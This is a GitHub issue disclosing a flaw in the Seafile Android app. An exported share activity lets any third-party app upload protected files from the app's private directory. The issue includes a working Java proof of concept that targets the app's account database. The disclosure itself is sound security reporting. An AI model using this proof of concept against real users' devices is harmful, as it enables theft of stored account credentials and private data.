Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerability - Possible to steal any protected files on Android #957

Open
alustinoff opened this issue Nov 29, 2022 · 0 comments
Open

Vulnerability - Possible to steal any protected files on Android #957

alustinoff opened this issue Nov 29, 2022 · 0 comments
Labels

Comments

@alustinoff
Copy link

Description

There is an issue that allows to retrieve any files from protected directory of application - /data/data/com.seafile.seadroid2/*. The issue is caused by exported activity com.seafile.seadroid2.ui.activity.ShareToSeafileActivity with intent filters SEND and android.intent.action.SEND_MULTIPLE that accept URI of files for upload. Any 3rd-party application could start this activity and upload on seafile server any files such as database file from protected directory.

For example the same vulnerabilities with similar impact in another apps:

Proof of Concept

// Java_PoC.java
protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
        StrictMode.setVmPolicy(builder.build());
        Intent intent = new Intent("android.intent.action.SEND");
        intent.setClassName("com.seafile.seadroid2", "com.seafile.seadroid2.ui.activity.ShareToSeafileActivity");
        intent.setType("*/*");
        intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        ArrayList mStreamsToUpload = new ArrayList<>();
        mStreamsToUpload.add(Uri.parse("file:///data/data/com.seafile.seadroid2/databases/account.db"));
        intent.putExtra("android.intent.extra.STREAM", mStreamsToUpload);
        startActivity(intent);
    }

Impact

This vulnerability is capable of stealing file with confidential data from protected directory of application.

Occurrences

https://github.com/haiwen/seadroid/blob/master/app/src/main/java/com/seafile/seadroid2/ui/activity/ShareToSeafileActivity.java#L118
There is not some check for directory /data/data.

@zhwanng zhwanng added the todo label Dec 16, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants